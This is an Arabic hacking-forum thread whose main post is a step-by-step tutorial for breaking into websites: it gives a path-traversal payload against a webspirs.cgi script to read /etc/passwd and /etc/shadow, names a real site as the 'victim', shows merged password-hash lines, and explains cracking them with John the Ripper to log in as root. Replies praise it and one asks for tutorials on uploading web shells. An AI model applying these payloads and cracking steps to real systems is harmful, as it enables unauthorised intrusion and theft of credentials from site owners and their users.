اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

شرح اختراق موقع من البداية الى النهاية ....^_^

شرح اختراق موقع من البداية الى النهاية ....^_^


صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 10 من 12

الموضوع: شرح اختراق موقع من البداية الى النهاية ....^_^

  1. #1
    هكر متميز Array الصورة الرمزية مهكر القلوب
    تاريخ التسجيل
    Nov 2010
    الدولة
    نهاية العالم
    المشاركات
    1,790

    Newnews شرح اختراق موقع من البداية الى النهاية ....^_^



    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته .....
    كيفكم يا احلى اعضاء لاحلى منتدى ..... يا رب تكونوا بخير وصحة وسلامة

    ملاحظة ..
    لازم تعرفون ان الاختراق مايتم الا بوجود ثغره في الموقع !!!


    والثغرااات كثير ولكن اكثر الثغراااااا ت تستخدم من نظام لينوكس Linux وتكون مكتوبة بأحد اللغات بيرل او ++C وعند حصول احدنا على ثغره ,,,,,

    يحتاج الى مفسر الى اللغة المكتوبه بها الثغره هذه !!!!

    وهذه والحمد لله متوفر في Linux .

    الان انا ما عندي Linux هذا يعني ما اقدر اخترق موقع ؟؟؟؟؟؟؟

    لالالالالالالالالالالالال الالا تقدر ونص !!!!

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    ـــــــــــــــــــــــــ ـــــــــــــــ
    نبدأ الان بأول ثغره نقدر نستخدمها من ويندووز !!!

    اسهل الثغرااات هي ثغرات CGI وهي كثيره جدا ,,,

    اليوم اريد ان اشرح احد هذه الثغرات :

    الملف المشكله " او الثغره " يدعى webspirs.cgi هذا الملف هو المساعد على اختراق الموقع !!!

    ومنه نستطيع لقط " لطش " ملف الباسووورد !!

    الثغره عباره عن اضافة نضيقها الى اسم الموقع ويتم الاختراق بها !!!

    ماهي هذه الاضافه ؟؟؟؟؟؟

    هي /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd


    طيب هي راح تكون على الشكل التالي :

    /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwdاسم الموقع اللي بتخترقه


    الان انا دورت على موقع نطبق عليه الكلام هذا !!!!!!!!

    الموقع الضحيه هو :

    http://wilsonweb2.hwwilson.com/

    كل ماعلينا هو لصق الثغره في الموقع والحصوووول على ملف الباسووورد !!!! لتصبح على الشطل التالي :

    http://wilsonweb2.hwwilson.com/etc/passwd


    اممممممممممممممممممممممم الموقع اخترق عن طريق الثغره هذه ممتااااااااز !!!!!

    لكن الباسووورد للاسف مشفر !!!! والحل ؟؟؟؟؟

    سهل ان شاء الله !!!!

    نحتاج الى كود اخر لنكشف التشفير ونغير الكلمات المشفره الى كلمات واضحة ونستنتج الباسووورد للموقع !!!

    الان الكلمة المشفره تكون في ملف اسمه shadow كيف نجيبة !!!

    بالكود التالي :

    /cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/shadow

    وبتطبيقه على موقعنا نحصل على :

    http://wilsonweb2.hwwilson.com/etc/shadow


    الان وجدنا الباسووورد المشفر نحتاج الى شوية تعديلات بسيطة لتكوين ملف وكسر التشفير واستخراج الباسوور للموقع .

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    ـــــــــــــــــــــــــ ـــــــــــــــــــــــــ

    ـــــــــــــــــــــــــ ـــــ

    كيف هذه التعديلات ؟؟؟؟

    ملف الشادو به باسوورد الروت " مدير الموقع " root !!!

    الان نعمل التالي :

    الحين ملف passwd في بعد كل اسم X مثل root:X


    من ملف شادو تقارن كل اكس بما يقابله من تشفير وتحطه مكانه ,,,

    بالمقارنه بصورة سريعه root:x: = JTTIe4QG268fg:10643 ,,,JTTIe4QG268fg:10643 تبدلها بالاكس

    ممكن يكون الملف مختلفه رموزه عندي وعندك !!!

    لكن احنا نكرر العمليه على كل اكس في الملف الاول ونغيرها بما يقابلها بالملف الثاني !!

    يا شباب الفقره هذه والله صعب شرحها لكن اهم شي التركيز في المكتوب !!!

    طيب لما ننسخ ونلصق فين نكتب الناتج ؟؟؟

    نكتب الناتج في مستند جديد وليكن الدفتر او صفحة وورد !!!

    هذه بدايه بسيطة لمستند الدفتر اللي انا مسويه للبرنامج !!!

    root:XOT4AiUKMRcKQ:10643
    :0:1:Super-User:/:/sbin/sh daemon:NP:6445
    :1:1::/: bin:NP:6445
    :2:2::/usr/bin: sys:NP:6445
    :3:3::/: adm:NP:6445
    :4:4:Admin:/var/adm: lp:NP:6445


    اكيد واضحة التغييرات فيه !!!

    طيب خلاص زبطنا كل شي الان والمستند جاهز خلصنا !!!!!

    لالالالالالالالالالالالال الالالالالالالالالالالالا

    لالالالالالالالالالالالال الالالا


    باقي نكسر التشفير الان باستخدام برنامج وين البرنامج ؟؟؟؟ وين ؟؟؟

    دقيقة اخرفش في اوراقي واجيب لكم الرنامج :

    اهاااا هذه وصلة تحميل الرنامج :

    http://www.openwall.com/john/john-16d.zip


    نزلوا البرنامج واحفظوا مستند الورد حقكم وانتظروني في الدرس القادكم


    : كسر التشفيررررررررر "

    وربي تعبت من الكتابه اهم شي لا احد يتفلسف ويفتح برنامج كسر الحماية عشان الواحد يبدأ خطوة خطوة !!!

    نزل البرنامج وخليه على ضغطه !!!

    لا تستعجل جايك بالدرس انا حبيت اعلمك خطوة خطوة ماابي اكثر عليك الدروس بعدين يتشتت ذهنك افهم الدرس وتابع معي الدرس القادم كيف تكسر التشفير !!



    =-=-=-=-
    نقلته حرف حرف ولا حرف طالع منه ولا منه
    (KRKR)
    __________________
    http://www.m3gic.com/vb/attachment.php?s=&postid=47356

    __________________________________________________ _______________
    تكملة الدرس
    =======
    هذا الدرس سيكون تكملة للدرس السابق وهو اختراق المواقع !!!

    اليوم سوف نتطرق إلى " أهم خطوة " في الاختراق إلا وهي كسر التشفير !!!

    توصلنا في الدرس السابق إلى الكلمة السرية ولكن للأسف كانت مشفره " وهي دائما ما تكون مشفره " !!!

    لذا لابد من كسر الشيفره والحصول على الكلمة السرية

    خطوات كسر التشفير :

    1- أولا قم بفتح الملف المضغوط الموجود على الموقع التالي :

    http://www.openwall.com/john/john-16d.zip

    عند فكك للضغط سوف تجد الملف المضغوط في unzipped إذا ما تعرف اتبع المسار التالي :
    جهاز الكمبيوتر >>> C >>> unzipped

    الآن سوف تجد المجلد التالي في unzipped وهو : john-16d

    افتح المجلد سوف تجد داخله مجلد بالاسم التالي : JOHN-16

    عند فتحك للمجلد سوف تجد مجلدين وهما DOC و RUN

    أهم شي عندنا هو مجلد RUN

    2- ألان أكيد الكل قام بعمل التغييرات في كلمة السر المشفرة ودمج الملفان مع بعضهما البعض ولم يتبقى إلا حفظ الملف باسم passwd وبدون امتداد !!!!

    طيب واللي ما يعرف يحفظ بدون امتداد !!!!! وش يسوي ؟؟؟؟

    يتبع الخطوات التالية :
    أولا يفتح الملف أكيد أنت كتبته في الورد طيب J اعمل أولا روح إلى حفظ باسم واحفظه باسم passwd

    ثم اعمل قص للملف وانسخه في مجلد الويندوز اللي موجود في C
    الآن رووح وشغل الدوووووس واكتب التالي :

    ren passwd.doc passwd
    تأكد انك داخل مجلد ويندوز !!!! من الدوس طبعا اذا لم تكن في داخل ويندوز اكتب التالي windows
    cd
    ثم اكتب السطر السابق .
    بعد ذلك اذهب لمجلد الويندوز وابحث عن passwd ثم اعمل لها قص وارجع إلى ملفنا القدييييييييييييييييم RUN والصقها فيه !!!!


    3- الآن لم يتبقى لدينا إلا القليل " هانت يا لربع " !!!!!

    افتح الدوس من جديد واكتب التالي :

    إذا كنت داخل مجلد ويندوز اكتب مايلي : cd john-16\run

    أما إذا كنت على السي اكتب السطرين التاليين :
    cd windows ثم انتر
    وبعد ذلك اكتب : cd john-16\run ثم انتر

    بعد ذلك اكتب السطر التالي :
    john -i passwd ثم انتر

    الآن سوف يقوم الدوس بكسر الشيفره !!!!

    كل ما عليك هو أن تضغط انتر كل خمس دقائق !! وتلاحظ كلمة السر !!!

    وسوف تحفظ النتيجة في الملف john.pot الموجود في RNN

    وعلى فكره بعض عمليات الكسر تأخذ دقا يق وبعضها ساعات

    الآن لم يتبقى سوى اختراق الموقع :

    تروح تخترقهم باليوزر root والباسوورد الناتجة عندك


    خاتمه :

    أنا كتبت هذا الموضوع بأبسط الطرق الممكنة حيث كان بمقدوري شرحه في 10 اسطر ولكن أنا اعتبرت أنني اشرح إلى ناس ليس لديهم خبره في الدوس أو كسر التشفير !!!
    :bd: :ab:
    __________________


    وانشالله يكون وفيت بشرحي
    وهده الطريقة انا طبقتها عندي بالينيكس
    وطلعت تمام
    بس لا تنسونا بردودكم الحلوة .... رجاء



  2. #2
    هكر نشيط Array الصورة الرمزية GMOR
    تاريخ التسجيل
    Feb 2011
    الدولة
    ,.~ارض الله وسعهـ ,.~
    المشاركات
    152

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    ~,.بطل يامهكر القلوب~.

    .~درس وافي وكافي ياالغلا,.ْ

    تحياتي:gmor


  3. #3
    محظور Array
    تاريخ التسجيل
    Sep 2010
    الدولة
    under net
    المشاركات
    1,775

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    تسلم اخي على الطرح تقبل مروري البسيط



  4. #4
    هكر متميز Array الصورة الرمزية Ace
    تاريخ التسجيل
    May 2010
    الدولة
    In Hell
    المشاركات
    1,849

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    ينقل خيو المره الجاية التزم بي الاقسام


  5. #5
    هكر متميز Array الصورة الرمزية مهكر القلوب
    تاريخ التسجيل
    Nov 2010
    الدولة
    نهاية العالم
    المشاركات
    1,790

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    مشكووووووووووووووووووور على ردودكم الحلوة ما قصرتم بارك الله فيكم


  6. #6
    هكر مبتديء Array الصورة الرمزية marcelo
    تاريخ التسجيل
    Oct 2011
    المشاركات
    26

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    nice ya man i like that



  7. #7
    هكر مجتهد Array الصورة الرمزية HaCKer011
    تاريخ التسجيل
    Sep 2011
    المشاركات
    474

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    مشكووووووووووووووور
    تقبل مروري


  8. #8
    هكر مبتديء Array الصورة الرمزية bo.saad
    تاريخ التسجيل
    Oct 2011
    الدولة
    في بلاد الحرمين عزها الله
    المشاركات
    66

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    يعطيك العافيه اخوي


    وجزاك الله الف خير


    اخوك ابو سعد


  9. #9
    هكر نشيط Array الصورة الرمزية حنين المجنونه
    تاريخ التسجيل
    Dec 2010
    المشاركات
    142

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    بسراحه موضوع رهيب بس هاذا كان زمان يعني اغلب الثغرات مقفله وانا بسراحه امنيتي اني اتابع شرح اختراق موقع مثلا مقطع فيديو ونطبق يعني مثلا كيف نستهدف الموقع بعد مانستهدف الموقع كيف نحصل ثغره واذا حصلنا ثغره كيف نستخدمها واذا عرفنا كيف نستخدمها كيف نرفع الشل واذا رفعنا الشل كيف نستخدم الشل طبعا الدرووس لازم تكوون على ثغرات جديده هاذي امنيتي بروووب



  10. #10
    هكر نشيط Array الصورة الرمزية حنين المجنونه
    تاريخ التسجيل
    Dec 2010
    المشاركات
    142

    افتراضي رد: شرح اختراق موقع من البداية الى النهاية ....^_^

    بطل يسلموووووو على الموضوع اكث من رائع السراحه ياخي تدري ياصاحب الموضوع وش ودي فيه ودي اني القا شرح اختراق المواقع طبعا الشرح راح يكون مقطع فيديو وتطبيق على موقع تقبل مروري يامهكر القلووووووووب ولك احلىى تقييم ياملك بروووب


صفحة 1 من 2 12 الأخيرةالأخيرة

المواضيع المتشابهه

  1. تعلم لغة c++ من البداية الى الأحتراف
    بواسطة rakan naber في المنتدى منتدى لغات البرمجة
    مشاركات: 32
    آخر مشاركة: 07-23-2013, 02:31 AM
  2. كيف تكون البداية
    بواسطة اطمح اصير هكر في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 5
    آخر مشاركة: 06-23-2011, 09:07 AM
  3. النهاية, الموت, خالد الراشد
    بواسطة عويدعيد في المنتدى المنتدى إلاسلامي
    مشاركات: 0
    آخر مشاركة: 01-09-2011, 01:58 PM
  4. تم اختراق موقع 3rbfree.com اكبر موقع اغاني
    بواسطة dragon-hacker في المنتدى معرض الانجازات
    مشاركات: 7
    آخر مشاركة: 11-26-2010, 11:53 PM
  5. اقرأها حتى النهاية
    بواسطة القبطــــان في المنتدى المنتدى إلاسلامي
    مشاركات: 4
    آخر مشاركة: 02-05-2010, 08:46 PM

وجد الزوار هذه الصفحة بالبحث عن:

inurl:e107_pluginsradio_plan

اختراق المواقع من الصفر

تعلم اختراق المواقع من الصفر

شرح دعس موقع

تعليم اختراق المواقع من الصفر

شرح اختراق موقع

كيفية اختراق موقع من البداية حتى النهاية

فديواختراق موقع من البدايه الى النهايه

اختراق موقع من البداية حتى النهاية

شرح تهكير صفحة الا

شرح اختراق موقع لدخول الشل من الصفر بالصور من الصفر

شرح كامل البدايه الى نهاية اختراق المواقع

شرح اختراق موقع من البدايه الى النهايه

دورة اختراق مواقع من البداية حتى النهاية

شرح كيف اكون هكر نت من البدايه الى النهايه بالصور

همسا ت القلووووووووب

تنزيل برنامج يقص الاغاني اكثر من دقيقة مهكر

شرح اكث

تحميل سوبر يوزر مهكر جاهز للعمل

الاختراق شرح من البداية حتى النهاية

كيفية اختراق موقع من البداية الي النهاية

www.aljyyosh.comvb showthread.phpt=28789

شرح من الصفر اختراق السيرفرات

شرح اختراق المواقع من الصفر

اختراق المواقع من الصفر للنهاية

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •